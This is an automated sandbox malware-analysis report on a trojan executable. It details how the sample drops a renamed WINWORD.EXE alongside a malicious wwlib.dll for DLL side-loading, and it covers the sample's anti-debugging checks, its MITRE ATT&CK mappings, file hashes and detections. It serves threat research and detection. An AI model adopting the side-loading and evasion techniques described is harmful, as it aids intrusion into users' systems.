Source: C:\Users\user\Desktop\9nZ3r5ZN45.exeCode function: 0_2_0083A383 FindFirstFileW,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0083A383
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exeCode function: 0_2_0084B014 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_0084B014
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exeCode function: 0_2_0085A02E FindFirstFileExA,0_2_0085A02E
Source: C:\Windows\Help\Windows\LibHelper.exeCode function: 1_2_01075746 FindFirstFileExW,1_2_01075746
Source: C:\Windows\Help\Windows\WINWORD.EXECode function: 2_2_6D868875 FindFirstFileExW,2_2_6D868875
Source: C:\Windows\Help\Windows\WINWORD.EXECode function: 2_2_03039CCD FindFirstFileExW,2_2_03039CCD
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exeCode function: 0_2_0084D3A8 VirtualQuery,GetSystemInfo,0_2_0084D3A8
Source: C:\Windows\Help\Windows\WINWORD.EXECode function: 2_2_03062842 rdtsc 2_2_03062842
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exeCode function: 0_2_0084E4F5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0084E4F5
Source: C:\Windows\Help\Windows\WINWORD.EXECode function: 2_2_2FF116C4 GetLastError,OutputDebugStringA,2_2_2FF116C4
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exeCode function: 0_2_00856B19 mov eax, dword ptr fs:[00000030h]0_2_00856B19
Source: C:\Windows\Help\Windows\LibHelper.exeCode function: 1_2_01075478 mov eax, dword ptr fs:[00000030h]1_2_01075478
Source: C:\Windows\Help\Windows\LibHelper.exeCode function: 1_2_01073CED mov eax, dword ptr fs:[00000030h]1_2_01073CED
Source: C:\Windows\Help\Windows\WINWORD.EXECode function: 2_2_6D868442 mov eax, dword ptr fs:[00000030h]2_2_6D868442
Source: C:\Windows\Help\Windows\WINWORD.EXECode function: 2_2_6D866F25 mov eax, dword ptr fs:[00000030h]2_2_6D866F25
Source: C:\Windows\Help\Windows\WINWORD.EXECode function: 2_2_03051188 mov eax, dword ptr fs:[00000030h]2_2_03051188
Source: C:\Windows\Help\Windows\WINWORD.EXECode function: 2_2_03069722 mov eax, dword ptr fs:[00000030h]2_2_03069722
Source: C:\Windows\Help\Windows\WINWORD.EXECode function: 2_2_03035F74 mov eax, dword ptr fs:[00000030h]2_2_03035F74
Source: C:\Windows\Help\Windows\WINWORD.EXECode function: 2_2_03067E15 mov eax, dword ptr fs:[00000030h]2_2_03067E15
Source: C:\Windows\Help\Windows\WINWORD.EXECode function: 2_2_030696DE mov eax, dword ptr fs:[00000030h]2_2_030696DE
Source: C:\Windows\Help\Windows\WINWORD.EXECode function: 2_2_03052D21 mov eax, dword ptr fs:[00000030h]2_2_03052D21
Source: C:\Windows\Help\Windows\WINWORD.EXECode function: 2_2_0303946E mov eax, dword ptr fs:[00000030h]2_2_0303946E
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exeCode function: 0_2_0085ACFC GetProcessHeap,0_2_0085ACFC
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exeCode function: 0_2_0084E643 SetUnhandledExceptionFilter,0_2_0084E643
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exeCode function: 0_2_0084E4F5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0084E4F5
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exeCode function: 0_2_0084E7FC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0084E7FC
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exeCode function: 0_2_00857C57 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00857C57
Source: C:\Windows\Help\Windows\LibHelper.exeCode function: 1_2_01071C8F SetUnhandledExceptionFilter,1_2_01071C8F
Source: C:\Windows\Help\Windows\LibHelper.exeCode function: 1_2_010719D8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_010719D8
Source: C:\Windows\Help\Windows\LibHelper.exeCode function: 1_2_010736EF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_010736EF
Source: C:\Windows\Help\Windows\LibHelper.exeCode function: 1_2_01071AF9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_01071AF9
Source: C:\Windows\Help\Windows\WINWORD.EXECode function: 2_2_2FF11B2C IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,2_2_2FF11B2C
Source: C:\Windows\Help\Windows\WINWORD.EXECode function: 2_2_6D86497A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_6D86497A
Source: C:\Windows\Help\Windows\WINWORD.EXECode function: 2_2_6D8667F2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_6D8667F2
Source: C:\Windows\Help\Windows\WINWORD.EXECode function: 2_2_6D864A9B IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_6D864A9B
Source: C:\Windows\Help\Windows\WINWORD.EXECode function: 2_2_03032289 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_03032289
Source: C:\Windows\Help\Windows\WINWORD.EXECode function: 2_2_0303760D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_0303760D
Source: C:\Windows\Help\Windows\WINWORD.EXECode function: 2_2_03032CAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_03032CAF

HIPS / PFW / Operating System Protection Evasion:

barindex
Injects files into Windows applicationShow sources
Source: C:\Windows\Help\Windows\WINWORD.EXEInjected file: C:\Windows\Help\Windows\wwlib.dll was created by C:\Users\user\Desktop\9nZ3r5ZN45.exeJump to behavior
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exeProcess created: C:\Windows\Help\Windows\LibHelper.exe 'C:\Windows\Help\Windows\LibHelper.exe' Jump to behavior
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exeProcess created: C:\Windows\Help\Windows\WINWORD.EXE 'C:\Windows\Help\Windows\WINWORD.EXE' Jump to behavior
Source: C:\Windows\Help\Windows\WINWORD.EXECode function: 2_2_6D8611F0 GetCurrentThread,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateFileMappingA,MapViewOfFile,CreateThread,GetLastError,FindCloseChangeNotification,UnmapViewOfFile,2_2_6D8611F0
Source: LibHelper.exe, 00000001.00000002.462552264.0000000001430000.00000002.00000001.sdmp, WINWORD.EXE, 00000002.00000002.462301547.0000000001940000.00000002.00000001.sdmpBinary or memory string: Program Manager
Source: LibHelper.exe, 00000001.00000002.462552264.0000000001430000.00000002.00000001.sdmp, WINWORD.EXE, 00000002.00000002.462301547.0000000001940000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
Source: LibHelper.exe, 00000001.00000002.462552264.0000000001430000.00000002.00000001.sdmp, WINWORD.EXE, 00000002.00000002.462301547.0000000001940000.00000002.00000001.sdmpBinary or memory string: Progman
Source: LibHelper.exe, 00000001.00000002.462552264.0000000001430000.00000002.00000001.sdmp, WINWORD.EXE, 00000002.00000002.462301547.0000000001940000.00000002.00000001.sdmpBinary or memory string: Progmanlock
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exeCode function: 0_2_0084E34B cpuid 0_2_0084E34B
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_00849E0C
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exeCode function: 0_2_0084CC0E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,DeleteObject,CloseHandle,0_2_0084CC0E
Source: C:\Users\user\Desktop\9nZ3r5ZN45.exeCode function: 0_2_0083AA39 GetVersionExW,0_2_0083AA39

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsCommand and Scripting Interpreter2Windows Service2Windows Service2Masquerading12Input Capture1System Time Discovery1Remote ServicesInput Capture1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsService Execution1DLL Side-Loading1Process Injection112Virtualization/Sandbox Evasion2LSASS MemoryQuery Registry1Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsShared Modules1Logon Script (Windows)DLL Side-Loading1Process Injection112Security Account ManagerSecurity Software Discovery26SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Deobfuscate/Decode Files or Information1NTDSVirtualization/Sandbox Evasion2Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information2LSA SecretsProcess Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonSoftware Packing2Cached Domain CredentialsFile and Directory Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup ItemsDLL Side-Loading1DCSyncSystem Information Discovery24Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobFile Deletion1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
9nZ3r5ZN45.exe50%VirustotalBrowse
9nZ3r5ZN45.exe25%ReversingLabsWin32.Trojan.Bingoml

Dropped Files

SourceDetectionScannerLabelLink
C:\Windows\Help\Windows\wwlib.dll100%AviraTR/Crypt.XPACK.Gen2
C:\Windows\Help\Windows\LibHelper.exe17%ReversingLabsWin32.Trojan.Generic
C:\Windows\Help\Windows\WINWORD.EXE0%MetadefenderBrowse
C:\Windows\Help\Windows\WINWORD.EXE0%ReversingLabs
C:\Windows\Help\Windows\wwlib.dll17%ReversingLabs

Unpacked PE Files

SourceDetectionScannerLabelLinkDownload
2.2.WINWORD.EXE.6d860000.3.unpack100%AviraTR/Crypt.XPACK.Gen2Download File

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://%s%08x.txtc:0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://%s%08x.txtc:WINWORD.EXE, 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmpfalse
  • Avira URL Cloud: safe
low

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:31.0.0 Emerald
Analysis ID:377823
Start date:30.03.2021
Start time:01:16:10
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 6m 38s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:9nZ3r5ZN45 (renamed file extension from none to exe)
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:21
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Detection:MAL
Classification:mal80.evad.winEXE@5/3@0/0
EGA Information:Failed
HDC Information:
  • Successful, ratio: 42.8% (good quality ratio 40.4%)
  • Quality average: 79.5%
  • Quality standard deviation: 28.7%
HCA Information:
  • Successful, ratio: 52%
  • Number of executed functions: 129
  • Number of non-executed functions: 175
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
Warnings:
Show All
  • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

TimeTypeDescription
01:16:57API Interceptor26x Sleep call for process: LibHelper.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Windows\Help\Windows\LibHelper.exe
Process:C:\Users\user\Desktop\9nZ3r5ZN45.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):173568
Entropy (8bit):5.389453047477484
Encrypted:false
SSDEEP:3072:l9WNnc6HMMIZgj8/DRuFusgHIscPSmUCoxn:l9Wx2gquFuDxn
MD5:813B19969C3B67C6BB1369433142021A
SHA1:68227261421DD1707BDD0DBCCA0C62B89BD09D03
SHA-256:3B15BC7DD4DD8379A9A8E19DF06C67F3E08FCC694CC5BA95D45E50BFD3412EF1
SHA-512:73C101C29B63B87C99CE4BFB1A9B9F3DD0C89C68AB5371BD796468254EF87E0FC68823CE15952CE4CFADEF4608A7223DC50FB46521BD659481DFC1835982E6E4
Malicious:true
Antivirus:
  • Antivirus: ReversingLabs, Detection: 17%
Reputation:low
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............................b..........W.......W.......W.................~......~.......b....~......Rich...........PE..L...O.a`..........................................@.......................................@..................................%..<....P...u......................t.......................................@...............p............................text.............................. ..`.rdata...].......^..................@..@.data........0......................@....rsrc....u...P...v... ..............@..@.reloc..t...........................@..B........................................................................................................................................................................................................................................................................................................
C:\Windows\Help\Windows\WINWORD.EXE
Process:C:\Users\user\Desktop\9nZ3r5ZN45.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1422168
Entropy (8bit):5.910237374197159
Encrypted:false
SSDEEP:24576:wLZmQR3caJZLZmvNzc0TDZodoSRsfHMbvmQakU:8ZmQyaJ1ZmFcqi+SRAG+J
MD5:15E52F52ED2B8ED122FAE897119687C4
SHA1:6E35AE1D5B6F192109D7A752ACD939F5CA2B97A6
SHA-256:8CFB55087FA8E4C1E7BCC580D767CF2C884C1B8C890AD240C1E7009810AF6736
SHA-512:338C12AF5AF509C19932619007AB058E0E97B65FE32609F14D29F6CC7818814DBDBB8613F81146A10A78197B3F6FBC435FAB9FE1537D1EB83C30B9F4487B6AEA
Malicious:false
Antivirus:
  • Antivirus: Metadefender, Detection: 0%, Browse
  • Antivirus: ReversingLabs, Detection: 0%
Reputation:low
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........JI.N+'_N+'_N+'_Py._M+'_GS._L+'_GS._M+'_GS._]+'_i.\_M+'_N+&_.+'_GS._M+'_GS._O+'_GS._O+'_GS._O+'_RichN+'_........................PE..L....%.K.....................|...............@.....0.................................^....@..........................%......\&..<....@..ts..............X............+..8...............................@............................................text...(........................... ..`.data........0......."..............@....rsrc...ts...@...t...$..............@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................
C:\Windows\Help\Windows\wwlib.dll
Process:C:\Users\user\Desktop\9nZ3r5ZN45.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):400384
Entropy (8bit):6.570599153043862
Encrypted:false
SSDEEP:12288:LRduZPxM5Ik3xkjZnj9jgZH0HVNPfFNN:L+tZhxL
MD5:B3A134E15E3F33DE0B2B1F189C240DD1
SHA1:9C0CA0A8869C2DACB448EF7294EB1C30846E1F44
SHA-256:5666C5BB0EFCF74D962E25F75EE73F37F9C02C9C1D5F7761F3804458185252B0
SHA-512:58AD874FE33D4A347C119FD4609B01B64A3A9DC1743F84DAAC3C5EAE6D6D83DF13591988883FDB09DBF2C62D38018EF8EFFBECC84AC166CE1C1AA2C7EBA8D437
Malicious:true
Yara Hits:
  • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: C:\Windows\Help\Windows\wwlib.dll, Author: Florian Roth
Antivirus:
  • Antivirus: Avira, Detection: 100%
  • Antivirus: ReversingLabs, Detection: 17%
Reputation:low
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........J..+...+...+...C...+...C..9+...C...+...Z...+...Z...+...y^..+...Z...+...C...+...+...+..)Y...+..)Y@..+...+(..+..)Y...+..Rich.+..................PE..L...8.a`...........!.........>......TI....................................................@.................................DY..<....P.......................`.......N.......................O.......N..@...............h............................text...J........................... ..`.rdata..ja.......b..................@..@.data........p.......L..............@....detourc..... ......................@..@.detourd.....@......................@....rsrc........P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................

Static File Info

General

File type:PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):7.781320186803254
TrID:
  • Win32 Executable (generic) a (10002005/4) 99.96%
  • Generic Win/DOS Executable (2004/3) 0.02%
  • DOS Executable Generic (2002/1) 0.02%
  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:9nZ3r5ZN45.exe
File size:980255
MD5:910fe72c4f1bd5a451561f732d94a8b8
SHA1:a93ebdd16c5862b178d6e5c58d3e074df772a021
SHA256:6beb4a5bcbdaf33f697eea6a4f7f2e9704cc88c20c265d0ce42287d930d06345
SHA512:e5369b02851b437a7ed68607ff806acaf2c5d517cbd2fc4e3798f95b497d84858650f728d3b68861cb3ecd4012bdc2fb8dd4a0285d4e4dcbd25f10947813ea47
SSDEEP:24576:KNcBtkaXI+ASdfCsNHHbMz9r4gcIsl2PBSCKu6P:NZ68fL+R1sIX+P
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...,...._......._..'...._f.'...._..'..

File Icon

Icon Hash:d49494d6c88ecec2

Static PE Info

General

Entrypoint:0x41e239
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:0x5DE8B3B3 [Thu Dec 5 07:37:23 2019 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:5
OS Version Minor:1
File Version Major:5
File Version Minor:1
Subsystem Version Major:5
Subsystem Version Minor:1
Import Hash:fcf1390e9ce472c7270447fc5c61a0c1

Entrypoint Preview

Instruction
call 00007FC918A700AFh
jmp 00007FC918A6FAE3h
cmp ecx, dword ptr [0043D668h]
jne 00007FC918A6FC55h
ret
jmp 00007FC918A70226h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 00433068h
mov dword ptr [ecx], 00434284h
ret
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007FC918A6304Ah
mov dword ptr [esi], 00434290h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 00434298h
mov dword ptr [ecx], 00434290h
ret
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007FC918A6FBFCh
push 0043A4D8h
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007FC918A724E4h
int3
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007FC918A6FC12h
push 0043A70Ch
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007FC918A724C7h
int3
jmp 00007FC918A74525h
jmp dword ptr [00432260h]
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push 00421480h
push dword ptr fs:[00000000h]
mov eax, dword ptr [esp+10h]

Rich Headers

Programming Language:
  • [ C ] VS2008 SP1 build 30729
  • [EXP] VS2015 UPD3.1 build 24215
  • [LNK] VS2015 UPD3.1 build 24215
  • [IMP] VS2008 SP1 build 30729
  • [C++] VS2015 UPD3.1 build 24215
  • [RES] VS2015 UPD3 build 24213

Data Directories

NameVirtual AddressVirtual Size Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT0x3b6100x34.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT0x3b6440x3c.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE0x620000xd474.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
IMAGE_DIRECTORY_ENTRY_BASERELOC0x700000x212c.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG0x397d00x54.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
IMAGE_DIRECTORY_ENTRY_TLS0x00x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x342180x40.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
IMAGE_DIRECTORY_ENTRY_IAT0x320000x260.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x3abb40x120.rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

Sections

NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
.text0x10000x3060f0x30800False0.587940963273data6.69301762007IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata0x320000xa4020xa600False0.450465926205data5.20298013153IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data0x3d0000x238b00x1200False0.368272569444data3.83802003955IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.gfids0x610000xe80x200False0.333984375data2.11816950811IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc0x620000xd4740xd600False0.663441880841data6.85483760276IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc0x700000x212c0x2200False0.790441176471data6.6217922841IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

NameRVASizeTypeLanguageCountry
PNG0x626440xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedChineseChina
PNG0x6318c0x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedChineseChina
RT_ICON0x647380x568GLS_BINARY_LSB_FIRSTChineseChina
RT_ICON0x64ca00x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0ChineseChina
RT_ICON0x655480xea8dataChineseChina
RT_ICON0x663f00x468GLS_BINARY_LSB_FIRSTChineseChina
RT_ICON0x668580x10a8dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 0, next used block 0ChineseChina
RT_ICON0x679000x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0ChineseChina
RT_ICON0x69ea80x3d71PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedChineseChina
RT_DIALOG0x6dc1c0x18edataChineseChina
RT_DIALOG0x6ddac0xeedataChineseChina
RT_DIALOG0x6de9c0xd2dataChineseChina
RT_DIALOG0x6df700x112dataChineseChina
RT_DIALOG0x6e0840x2a2dataChineseChina
RT_DIALOG0x6e3280x1e6dataChineseChina
RT_STRING0x6e5100xb6dataChineseChina
RT_STRING0x6e5c80xd6dataChineseChina
RT_STRING0x6e6a00xbcdataChineseChina
RT_STRING0x6e75c0x74dataChineseChina
RT_STRING0x6e7d00x282dataChineseChina
RT_STRING0x6ea540x94dataChineseChina
RT_STRING0x6eae80x88dataChineseChina
RT_STRING0x6eb700x7cdataChineseChina
RT_STRING0x6ebec0x52dataChineseChina
RT_STRING0x6ec400x78dataChineseChina
RT_GROUP_ICON0x6ecb80x68dataChineseChina
RT_MANIFEST0x6ed200x753XML 1.0 document, ASCII text, with CRLF line terminatorsChineseChina

Imports

DLLImport
KERNEL32.dllGetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCommandLineA, GetEnvironmentStringsW, FreeEnvironmentStringsW, DecodePointer
gdiplus.dllGdiplusShutdown, GdiplusStartup, GdipCreateHBITMAPFromBitmap, GdipCreateBitmapFromStreamICM, GdipCreateBitmapFromStream, GdipDisposeImage, GdipCloneImage, GdipFree, GdipAlloc

Possible Origin

Language of compilation systemCountry where language is spokenMap
ChineseChina

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

General

Start time:01:16:55
Start date:30/03/2021
Path:C:\Users\user\Desktop\9nZ3r5ZN45.exe
Wow64 process (32bit):true
Commandline:'C:\Users\user\Desktop\9nZ3r5ZN45.exe'
Imagebase:0x830000
File size:980255 bytes
MD5 hash:910FE72C4F1BD5A451561F732D94A8B8
